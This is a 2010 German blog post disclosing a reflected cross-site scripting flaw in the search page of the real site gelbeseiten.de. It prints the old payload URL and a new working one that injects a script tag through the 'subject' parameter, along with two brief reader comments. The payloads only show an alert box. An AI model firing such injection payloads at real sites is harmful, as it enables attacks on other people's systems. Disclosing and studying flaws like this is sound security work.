Header
Apr 10 2010

[XSS] www.gelbeseiten.de

posted by J0hn.X3r Vulnerable Sites

Dachte mir nach 2 Jahren, schau ich mal wieder auf www.gelbeseiten.de vorbei, ob sie meine damals gefundene XSS Luecke (http://www.xssed.com/mirror/53711/) gefixxt haben. Und in der Tat, es hat sich was getan.. damals noch:

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject=<script>alert(1337)</script>

klappt nicht mehr.. dafuer heute:

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject="></script><script>alert(1337)</script>

Da bursali auch immer Screenshots als Beleg dazu postet, mach ichs diesmal auch.. Screenshot stammt von “Southpark“:


haxorlame at 13. April 2010, 17:45

Windows.

jang at 20. July 2011, 00:28

Theoretisch könnte man doch nu alles ranhängen, oder O.o
Voll witzig 😛


Write a comment

Comment